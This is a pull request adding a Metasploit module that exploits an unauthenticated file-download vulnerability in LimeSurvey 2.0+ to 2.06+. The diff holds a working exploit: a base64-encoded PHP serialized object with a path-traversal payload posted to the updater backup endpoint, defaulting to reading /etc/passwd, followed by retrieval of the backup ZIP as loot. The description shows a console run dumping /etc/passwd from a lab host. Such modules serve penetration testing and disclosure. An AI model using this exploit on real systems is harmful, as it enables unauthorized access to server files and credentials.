### PR TITLE
Limesurvey File Download

### DIFF
--- a/modules/auxiliary/admin/http/limesurvey_file_download.rb
+++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Limesurvey Unauthenticated File Download",
+      'Description'    => %q{
+        This module exploits an unauthenticated file download vulnerability
+        in limesurvey between 2.0+ and 2.06+ Build 151014. The file is downloaded
+        as a ZIP file and stored compressed.
+      },
+      'Author'         =>
+        [
+          'Pichaya Morimoto', # Vulnerability Discovery
+          'Christian Mehlmauer' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20151022-0_Lime_Survey_multiple_critical_vulnerabilities_v10.txt'],
+          ['URL', 'https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015'],
+          ['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']
+        ],
+      'DisclosureDate' => 'Oct 12 2015'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, "The base path to the limesurvey installation", '/']),
+        OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),
+        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 15])
+      ], self.class)
+  end
+
+  def filepath
+    datastore['FILEPATH']
+  end
+
+  def traversal_depth
+    datastore['TRAVERSAL_DEPTH']
+  end
+
+  def payload
+    traversal = "/.." * traversal_depth
+    file = "#{traversal}#{filepath}"
+    serialized = 'a:1:{i:0;O:16:"CMultiFileUpload":1:{s:4:"file";s:' + file.length.to_s + ':"' + file + '";}}'
+    Rex::Text.encode_base64(serialized)
+  end
+
+  def run
+    csrf_token = Rex::Text.rand_text_alpha(10)
+
+    vars_post = {
+      'YII_CSRF_TOKEN' => csrf_token,
+      'destinationBuild' => Rex::Text.rand_text_alpha(5),
+      'datasupdateinfo' => payload
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, 'index.php', 'admin', 'update', 'sa', 'backup'),
+      'cookie' => "YII_CSRF_TOKEN=#{csrf_token}",
+      'vars_post' => vars_post
+    })
+
+    if res and res.code == 200 and res.body and res.body.include?('File backup created:')
+      match = res.body.match(%r{<strong>File backup created: </strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})
+      if match
+        local_path = match[1]
+        download_url = match[2]
+        print_status("File saved to #{local_path}")
+        print_status("Downloading backup from URL #{download_url}")
+
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => download_url
+        })
+
+        if res and res.code == 200
+          path = store_loot(
+            'limesurvey.http',
+            'application/zip',
+            rhost,
+            res.body,
+            ::File.basename(local_path)
+          )
+          print_good("File saved in: #{path}")
+        else
+          print_error('Failed to download file')
+        end
+      else
+        print_error('Failed to download file')
+      end
+    else
+      print_error('Failed to download file')
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/limesurvey_file_download.rb
+++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb
@@ -60,18 +60,17 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def unzip_file(zipfile)
+    zip_data = Hash.new
     begin
-      zip_data = Hash.new
       Zip::File.open_buffer(zipfile) do |filezip|
         filezip.each do |entry|
           zip_data[::File.expand_path(entry.name)] = filezip.read(entry)
         end
       end
-      return zip_data
     rescue Zip::Error => e
       print_error("Error extracting ZIP: #{e}")
-      return nil
     end
+    return zip_data
   end
 
   def run

--- a/modules/auxiliary/admin/http/limesurvey_file_download.rb
+++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Auxiliary
       'vars_post' => vars_post
     })
 
-    if res and res.code == 200 and res.body and res.body.include?('File backup created:')
-      match = res.body.match(%r{<strong>File backup created: </strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})
+    if res and res.code == 200 and res.body and res.body.include?('Download this file')
+      match = res.body.match(%r{<div class="updater-background">\s+<p class="success " style="text-align: left;">\s+<strong>[^<]+</strong>\s+<br/>\s+([^<]+)<br/>\s+<a class="btn btn-success" href="([^"]+)" title="Download this file">Download this file</a>})
       if match
         local_path = match[1]
         download_url = match[2]


### PR DESCRIPTION
This module exploits an unauthenticated file download vulnerability in limesurvey 2.0+ - 2.06+ Build 151014.

https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20151022-0_Lime_Survey_multiple_critical_vulnerabilities_v10.txt

https://www.limesurvey.org/en/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015

Tested with this release:
https://github.com/LimeSurvey/LimeSurvey/releases/tag/2.06_plus_150930

PS: I hope I have chosen the right folder to put this module in. It looks like the file download modules are sprayed over all subfolders :(

```
msf auxiliary(limesurvey_file_download) > show options

Module options (auxiliary/admin/http/limesurvey_file_download):

   Name             Current Setting                Required  Description
   ----             ---------------                --------  -----------
   FILEPATH         /etc/passwd                    yes       Path of the file to download
   Proxies                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST            10.211.55.21                   yes       The target address
   RPORT            80                             yes       The target port
   TARGETURI        /LimeSurvey-2.06_plus_150930/  yes       The base path to the limesurvey installation
   TRAVERSAL_DEPTH  15                             yes       Traversal depth
   VHOST                                           no        HTTP server virtual host

msf auxiliary(limesurvey_file_download) > run

[*] File saved to /var/www/html/LimeSurvey-2.06_plus_150930/tmp/LimeSurvey_files_backup_2015-12-02_d3fa81543e467221fbafb14ce10e02a7.zip
[*] Downloading backup from URL http://10.211.55.21/LimeSurvey-2.06_plus_150930/tmp/LimeSurvey_files_backup_2015-12-02_d3fa81543e467221fbafb14ce10e02a7.zip
[+] Filename: /etc/passwd
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
firefart:x:1000:1000:,,,:/home/firefart:/bin/bash
mysql:x:105:112:MySQL Server,,,:/nonexistent:/bin/false

[+] File saved in: /Users/firefart/.msf4/loot/20151202111255_default_10.211.55.21_limesurvey.http_178212.bin
[*] Auxiliary module execution completed
msf auxiliary(limesurvey_file_download) >
```
